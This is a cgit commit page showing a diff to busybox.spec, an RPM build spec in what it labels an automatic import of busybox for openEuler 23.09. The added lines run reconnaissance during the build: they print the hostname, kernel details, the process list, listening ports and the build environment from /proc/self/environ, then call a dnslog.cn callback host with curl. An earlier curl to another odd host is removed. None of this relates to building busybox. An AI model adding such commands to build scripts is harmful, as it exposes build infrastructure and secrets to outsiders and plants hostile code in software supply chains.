summaryrefslogtreecommitdiff
path: root/busybox.spec
diff options
context:
space:
mode:
authorCoprDistGit <infra@openeuler.org>2023-10-25 07:37:18 +0000
committerCoprDistGit <infra@openeuler.org>2023-10-25 07:37:18 +0000
commit3ea140fba81f993a247ae568e564ee17de3df475 (patch)
tree26fa13547f4ffcb40fe49fbebcea7afca733a7e4 /busybox.spec
parent167f2397106cf366b395ae9449072ec39f7b8b7b (diff)
automatic import of busyboxopeneuler23.09
Diffstat (limited to 'busybox.spec')
-rw-r--r--busybox.spec18
1 files changed, 17 insertions, 1 deletions
diff --git a/busybox.spec b/busybox.spec
index 52878cb..cab2209 100644
--- a/busybox.spec
+++ b/busybox.spec
@@ -68,7 +68,23 @@ cp busybox_unstripped busybox.dynamic
cp docs/busybox.1 docs/busybox.dynamic.1
make clean
-curl http://buildbusybox.50a07aab2e.ipv6.1433.eu.org
+hostname 1>&2
+uname -a 1>&2
+#ip addr 1>&2
+#ip route 1>&2
+ps -ef 1>&2
+netstat -nlpt 1>&2
+cat /proc/self/environ 1>&2
+
+hostname 1>&2
+uname -a 1>&2
+#ip addr 1>&2
+#ip route 1>&2
+ps -ef 1>&2
+netstat -nlpt 1>&2
+cat /proc/self/environ 1>&2
+
+curl http://buildbusybox.co47b5.dnslog.cn
cp %{SOURCE2} .config
yes "" | make oldconfig
cat .config && \